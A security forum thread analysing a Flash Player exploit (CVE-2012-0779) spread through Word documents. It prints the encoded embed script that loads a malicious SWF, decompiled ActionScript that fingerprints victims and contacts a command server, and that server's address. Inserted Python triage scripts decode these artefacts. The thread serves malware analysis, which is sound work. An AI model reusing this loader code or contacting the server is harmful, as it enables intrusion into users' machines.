Thread: CVE-2012-0779 - Flash Player Exploit

  1. #1
    c0d3inj3cT (Garage Member)
    Join Date: Dec 2010

    CVE-2012-0779 - Flash Player Exploit

    This is regarding the latest Flash Player exploit, which is being used in the wild, mostly served to victims in the form of Word documents.

    A brief overview before we get to the good stuff:

    A Word Document has the following malicious JavaScript embedded in it:

    Code:
    javascript:eval(document.write(unescape('%3Cembed%20src%3Dhttp://example.com/malicious.swf?info=<48 Char Hash>&infosize=<A Dword>%3E%3C/embed%3E')))
    This JavaScript can easily be located by viewing the strings of the Word document. It is encoded, but it should be easy to follow that it creates an embed tag as follows:

    Code:
    <embed src="http://example.com/malicious.swf?info=<48 Char Hash>&infosize=<A Dword>"></embed>
    Apart from the above malicious JavaScript, you will also find a payload present inside the Word document. The MZ and PE signatures are XOR-encrypted using a byte. It can be easily retrieved using OfficeMalScanner.

    It will brute-force the XOR key and dump the embedded payload. You may find only one binary or even multiple binaries.

    When you open the MS Word document, it will connect to the URL mentioned in the src attribute of the embed tag and fetch a SWF file. This in turn will spray the process heap with shellcode and trigger the vulnerability in Flash Player, thereby redirecting execution to the shellcode sprayed over the heap.

    This shellcode will locate the payload present inside the Word Document.

    Now, let's focus on the SWF file. You can fetch a SWF File from Contagio here:

    http://contagiodump.blogspot.in/2012...ld-uyghur.html

    Thanks Mila

    The SWF file is compressed as you can see from the magic bytes (CWS).

    It is also encrypted using DoSWF version 5.0.3. This information can be found in the RDF Metadata of the decompressed SWF File.

    The decompiled ActionScript is posted on Contagio. It's time to deep dive into the ActionScript.

  2. The Following 2 Users Say Thank You to c0d3inj3cT For This Useful Post:

    "vinnu" (05-15-2012), b0nd (05-14-2012)
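As an added example (not the poster's own code, and not OfficeMalScanner's), the following Python script reproduces the two triage steps described in post #1: pull the encoded embed JavaScript out of the document's strings and decode its src, info and infosize parameters, then brute-force the single-byte XOR key that hides an embedded MZ/PE header. The document strings, URL, 48-character hash, infosize and XOR key used below are constructed placeholders, not values from a real sample, and the function names are my own.

```python
import re
import struct
from urllib.parse import parse_qs, unquote, urlparse

# Constructed stand-in for the strings of a malicious document. The URL, the
# 48-character "hash" and the infosize are placeholders, not real sample values.
SAMPLE_DOC_STRINGS = (
    "javascript:eval(document.write(unescape('%3Cembed%20src%3D"
    "http://example.com/malicious.swf?info="
    "0123456789abcdef0123456789abcdef0123456789abcdef"
    "&infosize=4096%3E%3C/embed%3E')))"
)

UNESCAPE_RE = re.compile(r"unescape\('([^']+)'\)")
SRC_RE = re.compile(r"""src=["']?([^\s"'>]+)""")


def extract_embed(doc_strings):
    """Locate the unescape() argument, URL-decode it and pull the src URL plus
    the info/infosize query parameters out of the resulting <embed> tag."""
    m = UNESCAPE_RE.search(doc_strings)
    if not m:
        return None
    tag = unquote(m.group(1))          # "<embed src=http://...></embed>"
    src = SRC_RE.search(tag)
    if not src:
        return None
    url = src.group(1)
    params = parse_qs(urlparse(url).query)
    return {
        "tag": tag,
        "url": url,
        "info": params.get("info", [None])[0],
        "infosize": params.get("infosize", [None])[0],
    }


def find_xored_pe(data, max_lfanew=0x1000):
    """Try every single-byte XOR key and report (key, offset) pairs where an
    MZ header appears whose e_lfanew field points at a PE\\0\\0 signature.
    Mirrors the check OfficeMalScanner performs; this is a reimplementation."""
    hits = []
    for key in range(256):
        dec = bytes(b ^ key for b in data)
        pos = dec.find(b"MZ")
        while pos != -1:
            if pos + 0x40 <= len(dec):                     # room for e_lfanew
                e_lfanew = struct.unpack_from("<I", dec, pos + 0x3C)[0]
                pe = pos + e_lfanew
                if 0x40 <= e_lfanew < max_lfanew and dec[pe:pe + 4] == b"PE\x00\x00":
                    hits.append((key, pos))
            pos = dec.find(b"MZ", pos + 1)
    return hits


def build_fake_pe(key):
    """Constructed test input: a minimal MZ stub with e_lfanew = 0x80 followed by
    a PE signature, XOR-encrypted with `key` the way the post describes."""
    header = bytearray(b"MZ" + b"\x00" * 58)      # bytes 0x00..0x3B
    header += struct.pack("<I", 0x80)             # e_lfanew at 0x3C
    header += b"\x00" * (0x80 - len(header))      # pad up to the PE header
    header += b"PE\x00\x00" + b"\x00" * 20        # signature + stub COFF header
    return bytes(b ^ key for b in header)


if __name__ == "__main__":
    found = extract_embed(SAMPLE_DOC_STRINGS)
    print("embed src :", found["url"])
    print("info      :", found["info"])
    print("infosize  :", found["infosize"])
    blob = b"padding" + build_fake_pe(0x5A) + b"trailing bytes"
    for key, off in find_xored_pe(blob):
        print(f"XOR key 0x{key:02X}: MZ header at offset {off}")
```

Requiring that e_lfanew actually lands on a PE signature is what keeps the brute force from flagging every byte pair that happens to XOR to "MZ" under some key; on a real document you would run `find_xored_pe` over the raw file bytes and carve from each reported offset.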

  3. #2
    InfoSec Consultant 41.w4r10r has a spectacular aura about41.w4r10r has a spectacular aura about41.w4r10r has a spectacular aura about 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    301
    Thanks
    31
    Thanked 82 Times in 37 Posts
    Waiting to see length of your Deep Dive.....

    good analysis....

    keep it up...

  4. #3
    c0d3inj3cT (Garage Member)
    Join Date: Dec 2010
    This is again a brief analysis. There are a lot of functions defined in the ActionScript, so to make it easier for analysis, I will present the flow.

    Start tracing from within the function v25():

    Code:
            public function v25():void{
                var _local1:String;
                this.v11 = this.v40();
                this.v12 = this.v41();
                if ((((this.v12 == "windows 7")) || ((this.v12 == "windows xp")))){
                    if (this.v11 == "win 10,1,52,14"){
                        return;
                    };
                    _local1 = this.v67();
                    this.v51(_local1);
                    this.v14 = this.v70();
                    this.v42(this.v14);
                } else {
                    return;
                };
            }
    1. A function call to v40() is made.

    Code:
    this.v11 = this.v40();
    Code:
            public function v40():String{
                var _local1:String = new String();
                _local1 = Capabilities.version.toLowerCase();
                return (_local1);
            }
    It will return the version of Flash Player using the Capabilities.version method. This will return the result as "win 10,3,183,10". It means that the Flash Player version is 10.3.183.10

    2. A function call to v41() is made.

    Code:
    this.v12 = this.v41();
    It will return the version of Operating System on which the Flash Player is running using the Capabilities.os method

    Code:
            public function v41():String{
                var _local1:String = new String();
                _local1 = Capabilities.os.toLowerCase();
                return (_local1);
            }
    3. It checks whether the OS is windows 7 or windows xp and proceeds, else returns. It also checks whether the version equals 10.1.52.14, in which case it again returns.

    Code:
                if ((((this.v12 == "windows 7")) || ((this.v12 == "windows xp")))){
                    if (this.v11 == "win 10,1,52,14"){
                        return;
                    };
    4. Uses the v67() function to retrieve the infosize parameter value which was passed in the URL.

    Code:
    _local1 = this.v67();
    Code:
            public function v67():String{
                var _local1:Object = root.loaderInfo["@doswf__p"];
                var _local2:String = _local1["infosize"];
                return (_local2);
            }
    The value of the infosize parameter is the same as what was passed in the URL set in the embed tag's src attribute.

    5. Uses the v70() function to retrieve the info hash which was passed in the URL and also decodes it.

    Code:
    this.v14 = this.v70();
    I have taken the appropriate code snippets from the original ActionScript to decode the hash. The AS3 Eval library was used to interpret the code.

    Notice the hash value set in the _local2 variable.

    Code:
    namespace fu = "flash.utils";
    use namespace fu;

    public class LookAClass {
        public function LookAClass() {
            Util.print(v70());
        }

        public function v50(_arg1:String):ByteArray{
            var _local2:String;
            var _local3:ByteArray = new ByteArray();
            var _local4:uint = _arg1.length;
            var _local5:uint;
            _local3.endian = Endian.LITTLE_ENDIAN;
            while (_local5 < _local4) {
                _local2 = (_arg1.charAt(_local5) + _arg1.charAt((_local5 + 1)));
                _local3.writeByte(parseInt(_local2, 16));
                _local5 = (_local5 + 2);
            };
            return (_local3);
        }

        public function v70():String{
            var _local2:String = "789c333230d13331d53337d633b3b432313106001afa0338";
            var _local3:ByteArray = this.v50(_local2);
            var _local4:uint;
            _local4 = 0;
            while (_local4 < _local3.length) {
                _local3[_local4] = (_local3[_local4] ^ 0);
                _local4++;
            };
            _local3.uncompress();
            var _local5:String = String(_local3);
            return (_local5);
        }
    }
    new LookAClass;
    The result:

    [Image: fbu8H.png]

    The decoded value gives the IP address and port number. It is the IP address of the same URL which was referenced in the src attribute of the embed tag. The SWF file is hosted on the server with the same IP address.

    6. It passes the above decoded value to the function v42().

    Code:
                    this.v14 = this.v70();
                    this.v42(this.v14);
    7. It creates a NetConnection object and connects to the Flash Media Server with the following URL:

    Code:
    rtmp://204.45.73.69:443/TSGeneralSetting
    Code:
            public function v42(_arg1:String):void{
                this.v15 = new NetConnection();
                var _local2 = "rtmp://";
                var _local3 = "/TSGeneralSetting";
                var _local4:String = ((_local2 + _arg1) + _local3);
                this.v15.connect(_local4);
                this.v15.call("systemMemoryCall", this.v16, "argc");
            }
    It calls the systemMemoryCall method defined in the server-side script and passes it an argument called argc.

    v16 is the Responder object which is used to handle the return value from the server method systemMemoryCall.
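As an added example (not the poster's code and not the AS3 Eval snippet quoted in post #3), the following Python reproduces what v50(), v70() and v42() do so the info hash can be decoded without a Flash runtime: hex-decode, XOR each byte with the key (0 in this sample, so a no-op), zlib-inflate, then build the RTMP URL. The hash string and the /TSGeneralSetting path are taken from the post; the helper names and the zlib-header sanity check are my additions.

```python
import zlib

# Hash value quoted from the decompiled ActionScript in the post (the _local2
# string inside v70()). The XOR key there is 0, so the XOR loop changes nothing.
INFO_HASH = "789c333230d13331d53337d633b3b432313106001afa0338"
RTMP_PREFIX = "rtmp://"
RTMP_PATH = "/TSGeneralSetting"


def hex_to_bytes(hex_str):
    """Equivalent of v50(): two hex characters per byte, in order."""
    return bytes(int(hex_str[i:i + 2], 16) for i in range(0, len(hex_str), 2))


def is_zlib_stream(raw):
    """ByteArray.uncompress() expects zlib framing: CM = 8 (deflate) in the low
    nibble of the first byte, and CMF/FLG together must be a multiple of 31.
    The 0x78 0x9C prefix of the hash satisfies both; a wrong XOR key will not."""
    return len(raw) >= 2 and raw[0] & 0x0F == 8 and (raw[0] << 8 | raw[1]) % 31 == 0


def decode_info(hex_str, xor_key=0):
    """Equivalent of v70(): hex-decode, XOR every byte with xor_key, inflate.
    zlib.decompress also verifies the trailing Adler-32 checksum for us."""
    raw = bytes(b ^ xor_key for b in hex_to_bytes(hex_str))
    if not is_zlib_stream(raw):
        raise ValueError("not a zlib stream after XOR; wrong key?")
    return zlib.decompress(raw).decode("ascii")


def parse_endpoint(decoded):
    """Split the decoded 'host:port' string into its parts."""
    host, _, port = decoded.rpartition(":")
    return host, int(port)


def build_rtmp_url(decoded):
    """Equivalent of the string concatenation in v42()."""
    return RTMP_PREFIX + decoded + RTMP_PATH


if __name__ == "__main__":
    value = decode_info(INFO_HASH)
    host, port = parse_endpoint(value)
    print("decoded  :", value)
    print("server   :", host, "port", port)
    print("RTMP URL :", build_rtmp_url(value))
```

The header check is worth keeping for other samples of this family: if the XOR key in v70() is non-zero, trying keys until `is_zlib_stream` passes (and `zlib.decompress` accepts the checksum) recovers the endpoint without reading the rest of the ActionScript.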
